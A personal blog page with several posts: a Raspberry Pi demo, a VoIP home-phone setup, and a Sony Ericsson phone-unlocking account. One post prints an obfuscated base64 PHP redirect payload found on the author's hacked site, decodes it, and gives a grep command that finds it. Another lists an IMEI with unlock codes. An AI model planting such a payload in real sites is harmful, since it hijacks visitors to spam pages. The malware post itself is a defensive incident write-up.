December 2014
M T W T F S S
« Jul    
1234567
891011121314
15161718192021
22232425262728
293031  

Archives

First Raspberry Pi Lab: Hello There

Hello there!  This is my first attempt at messing with Raspberry Pi.

It’s pretty simple, pretty much everything is from Adafruit.  Including basic script instructions.  I modified few little things and added Obi-won saying “hello there”.

Check it out.

Damn you Hackers!!! Go to Hell!!!

So today, I noticed my another hack that’s been installed on my machine. I have to say ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number #3. The reason why I posted about this one is because it is actually pretty interesting and finding what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my project 365 page to post automatically to my website. This is when I first noticed a slowdown and issue when I am using the debugger from Facebook. At first I thought it was the wordpress plug in, but it occasionally works. I got everything ready, and posted my first auto post and strange things started to happen.

As I stated, everything looked normal at first until I click on the links provided by Facebook. When I click on the Facebook link to my website, it goes to some spam site. At first I thought it was the .htaccess hack that was I received a while back, but that is not the case. Then I thought maybe it was a DNS hack. That was also not the case, finally, I found the following in all my .php files on my web server.

It uses eval command and nested with base64_decode the following block of code.

DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ

it is quite clever. It is encoded and people may easily over look it, but when you decode the text this is what you get

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[‘HTTP_REFERER’];
$uag=$_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (!stristr($uag,”MSIE 7.0″)){
if (stristr($referer,”yahoo”) or stristr($referer,”bing”) or stristr($referer,”rambler”) or stristr($referer,”gogo”) or stristr($referer,”live.com”)or stristr($referer,”aport”) or stristr($referer,”nigma”) or stristr($referer,”webalta”) or stristr($referer,”begun.ru”) or stristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”) or stristr($referer,”tinyurl.com”) or preg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) or preg_match (“/google\.(.*?)\/url\?sa/”,$referer) or stristr($referer,”myspace.com”) or stristr($referer,”facebook.com”) or stristr($referer,”aol.com”)) {
if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){
header(“Location: http://minkof.sellclassics.com/”);
exit();
}
}
}
}
}

Tricky huh?

So well… solution? remove all code in all .php files and with a little help from “grep” I was able to locate all the bad codes.

grep -H -r ‘eval(base64_decode’ ./

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

Google Voice Turns 1

It’s pretty interesting…  Just recently I figured out how to use google voice and my old packet 8 ATA to get free phone service within US and today I found out that Google Voice turns 1.

Happy Birthday Google Voice!!!

http://lifehacker.com/5491684/google-voice-turns-one-heres-how-to-get-the-most-from-it?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+lifehacker%2Ffull+%28Lifehacker%29

Free land line phone with google voice, sipgate, and an old packet8 ATA!!!

So I don’t know what got into me yesterday, but I guess it was because of the awful AT&T services in my area. I cannot make a continuous call on AT&T’s 3G in my area without call drops. This is not only my problem, but everyone that I know with AT&T 3G service in Maple Leaf area. But anyways, that is not what this post is about.

So it’s been 2 over years since I moved to Seattle, and I’ve been thinking about moving my 509 number to a local 206 number for home, however, I never felt the need to do so. However, as weeks and months go by, I started to realized that I almost never use my land line a.k.a my home phone line or my plain old telephone service (POTS). So I’ve been thinking about dropping the service. The problem is that AT&T have such poor service in my area that I can not just depend on my iphone, no matter how awesome it is, I still need to have a home number. but $20+ dollars a month just to hold a number is pretty pricy. So here comes my solution…

At one time I have 2 lines with packet8, when I cancelled the 2nd line, the analog telephone adapter (ATA) from 8×8 was not returned. I have a bit understanding about VoIP so I figure since Packet8 uses SIP (Session Initiated Protocol), I can probably use the same ATA to point to some other SIP provider and get by really cheap. I’ve also already have a Google Voice (GV) account, so if I can link my google voice to my home phone that will be just wonderful. The following is what I found I can do and what is my plan.

The following are my steps and comments…

1) I know that I want to use GV as my home phone number, However, I need GV to point to an actual number since GV does not provide a physical phone service yet. One option is to use Gizmo5, but since they are being integrated into GV that is currently not an option.  So I register to SIPgate for a free account.  The advantage of a SIPGate account is that they provide a free 206 number and also they do not charge for  incoming calls.
Check out this article.
http://www.voip-news.com/feature/how-sipgate-one-stacks-060509/

2) The second step is to convert my DTA-310 ATA from packet 8 into a usable ATA. After reading online and playing with couple of different firmwares, this is what worked for me
– Downgrade to packet 8’s firmware version 1235 (sip1235unl.bin)
– From there load the leadtek firmware version AR171 (sip_bva8051s_ep1_voi86171.r0)
… it took me many tries to find this version of the firmware. Look in DSLreport for the firmware if you can’t find it in the archives.
– once load is successful, make sure you reload and restart the DTA-310 by using the reset button.

3) Once the new firmware is loaded it should look like this.

4)I found this site to help fill in the configuration. Use the SIP credentials in sipgate under settings to fill in the configuration. your sip-id is also the sip number in the DTA-310 configuration. Also make sure to change the server to point to sipgate.com. So after I finished this configuration, I was still unable to connect to the sip server until I configured the STUN server settings. (http://en.wikipedia.org/wiki/STUN) STUN= Simple Traversal of UDP through NAT. By configuring this server setting, it let you get back the local firewall. This is also the reason why we need to install the AR17I version of the firmware. The Packet8 1235 firmware also has a SIP server configurations page, however it does not have STUN settings. Only the Leadtek firmwares have those settings.

5) Finally, reboot the DTA-310 ATA and check to see if it is registered with SipGate. You can use Sipgate to test the connection.

6) Since I am using GV # as my primary number, I changed the outgoing caller ID within SIPGate to my Google voice number. and forward all google voice calls to my SIPgate number.

7) Test and all done!!!

Comments: Ok, I know that the title states that it is free.. well it is free for all incoming calls to SIPGate, however out going calls will cost 1.9 cents per minutes. But if you really think about it, for 9 bucks, it will give you around 450 minutes of talk time. So typically, those unlimited VoIP services are charging for 9 dollars a month. While SIPGate is a pay as you go solution.

Comment 2: There are also concerns about replacing land lines with this service without 911 services. Well, that is not entirely true. SIPGate do offer E911 service for $1.90 per month. That’s not too bad for a peace of mind.

Comment 3: SIPgates offers few other things in additional to GV, such as Free online FAX and they also provide additional phone number for a price.

Ultimately, it is a pretty cool deal… by using the GV frontend, when google finally allows SIP connections, it will be a very seamless switch over from SIPgate to all google. Gosh I am such a google fanboy… So this afternoon, I will go get me a DECT 6.0 wireless phone for my new home phone setup. Yeah!!!

Oh … and if you look in the diagram above, yes there is an even cheaper alternative shown it my hand drawn diagram, by using IPKALL and PBXes.org. More on that method maybe later.

References…
http://linuxstation.net/pub/voip/ — a place where all the old packet8 firmwares are located.
http://www.voip-info.org/wiki/view/Packet8+DTA310+and+Asterisk — another step by step instructions on working with DTA-310
http://www.dslreports.com/forum/ — look for additiona information on DTA310
http://www.broadbandreports.com/forum/remark,13924154~start=40 — Leadtek AR171 firmware
http://sipgate.com — sipgate website
http://voxilla.com/voxilla/tools/device-configuration-wizard/leadtek-configuration-wizard — ATA configuration Wizard

UPDATE 01/2011 : I’ve been having some problems with SIPGATE on dialing out. I have an Apple Airport Extreme wireless router. Unfortunately it doesn’t handle the VoIP/SIP traffic properly and it doesn’t support UPNP so after 30-45 seconds into an outgoing call. The call will drop. I have two options.

1) Replace the Aiport Extreme with a much more standard wireless router where I can configure the firewall/NAT better.

2) I’ve been using my google voice to dial out, which basically calls me first and then calls the other person. This is also what make it a free land line.

UPDATE 10/2011 : I’ve updated my router, so I did take option 1 from above. I’ve also starting to have a humming issue, after a long trouble shooting it was determined that the power supply was causing the humming and causing phone issues. after moving the power supply and replacing it, that fixed the problem.

UPDATE 02/2012: I’ve updated my old 8×8 ATA to a Grandstream HT-502.  Why? because I purchased an old analog rotary phone for my office and I want to use it with my phone setup and the Grandstream ATA supports pulse dialing.   I believe it is one of few ATA that still supports pulse dialing.

UPDATE 10/2012: For anyone else that  is thinking about using their Google voice as their voice over IP services… save your trouble of doing anything I’ve shown above… unless you really want to learn and hack… just purchase a OBi 100 ATA or OBi 110 ATA.  It is under 40 bucks and you are up and running in minutes.  less stress less trouble. :)

UPDATE 9/2013: Since Sipgate has shoutdown, I am now using an alternative.  Instead of going through sipgate and forwarding number to google voice, I am using YATE (Yet Another Telephone Engine) as my own gateway to Googlevoice.  If you don’t want to host your own, you can use Simonics‘ free service.  But be warned, that they require you to provide your google username and password.  Use Google’s 2 factor authentication just to be safe.  I will write a post about YATE at a later time when I have time.

Hacking Bluetooth

So it is almost 3:30 AM and I made a major break through in my bluetooth project. I was able to duplicate the bluetooth vulnerbility with an unpaired SE T616 phone, I was able to download it’s address book and FTP into the phone. WOW more to come tomorrow. I am going to bed now.

Unlocking Debranding Sony Ericsson T616

After hours of working on the Sony Ericsson T616 to unlock/debrand, so I can use my T-mobile SIM card in that AT&T; phone, I finally did. I have to say, it is not worth the $20 that I saved. But I guess I am a better person for figuring out how to unlock it. Well… it is not really hard but if you have all the right equipments. I … well… did not have all the right equipments. It is a very interesting underground industry of unlocking cellphones. There are so many unlocking services available and some are remote unlockers. So what it is, is they send you a cheap T28/DSC-11 serial cable, which then ask you to use thier software to login to their website and they will decode and unlock your phone. This is a one time deal, meaning once it is unlocked, the cable is pretty much useless, unless you pay for another unlocking. Well, my friend did that to unlock his phone and had the cable leftover. To me it seems like if they can unlock it from remote, I should be able to unlock it locally. After searching long and hard, I found that there are softwares available to unlock it, but it is for another type of cable using parallel ports/ printer ports, or USB. The software did not work for the T28 serial cable. In trying to figure this out, I want to see if I can see and thing from the serial port. So I used tera term to console into my phone. With the speed set to 115200 bps 8N1, I was able to see scrolling text. Some that actually made sense. By this time, I know that there got to be a way to crack this.

After a long look on google and in different forums, such as gsmhosting.com, I finally found the rosetta stone.

SEMCTOOL v2.2

a google search on SEMCtool_v2.2.zip, you will find many places to download it.

This was the key… this was the key program that will decypher the text and let me unlock the T616 over a serial T28 cable. Yeah!!!

I quickly download it and ran the program…
During the process … I found that you need to start the phone up after to select the jobs and push “do selected jobs”. Also make sure the baud rate is at 115200

it started to work…

Connect to phone
Check if RSA is active
Bypass boot authority
…. then boom…
ERROR 0001A1

oh no… it crashed and it did not continue…
I was about to give up, I was looking for different programs and trying to find ways to resolve then, then I found a forum message that says …
“keep pumping the power button until you get pass the boot sequence”

What?… ok … I will give it a try … then IT WORKED!!!

Connect to phone
Check if RSA is active
Bypass boot authority
Initialize boot
Load data to phone
Clear all SP locks
New SP Lock area format
Reset user code
Read all codes
New SP Lock area format
IMEI: 010193005165199
NCK: 82110220
NSCK: 70985399
CCK: 80152156
SPCK: 59993314
Operation succesfull

SWEET!!!!

I popped in my T-mobile sim… and it worked like a charm!!

Awesome!!!

I hope my adventure will help some poor soul that is trying to do the same.

Good luck.